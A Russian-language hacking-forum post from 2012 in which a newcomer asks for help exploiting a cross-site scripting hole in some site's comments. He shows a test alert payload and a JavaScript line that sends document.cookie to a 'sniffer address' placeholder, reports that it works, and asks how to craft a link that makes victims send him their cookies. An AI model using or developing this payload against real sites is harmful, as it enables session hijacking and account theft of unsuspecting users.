Тема: XSS [Mega Big Bug]
Показать сообщение отдельно

  #163  
Старый 19.12.2012, 01:00
Bugatti15047
Новичок
Регистрация: 18.12.2012
Сообщений: 7
С нами: 7052726

Репутация: 0
По умолчанию

HPC'офцы =)
Помогите пожалуйста новичку
Поиск фильтрует ">", но в комментариях пропускает

source:

Код:
alert("xss");

IMAGE http://4put.ru/pictures/max/483/1483881.jpg

Если прописывать

source:

Код:
img = new Image(); img.src = "адрес сниффера?"+document.cookie;

Все шикарно, на снифер отсылаются cookie
IMAGE http://4put.ru/pictures/max/483/1483888.jpg

Но как же реализовать такую ссылку, по которой переходя, жертва (пользователь сайта)
Отошлет мне cookie, я ведь не могу воспользоваться этим

source:

Код:
img = new Image(); img.src = "адрес сниффера?"+document.cookie;

Отправка cookies, ведь, произойдет только в том случае, если жертва сама вобьет этот скрипт в коммент?
 
Ответить с цитированием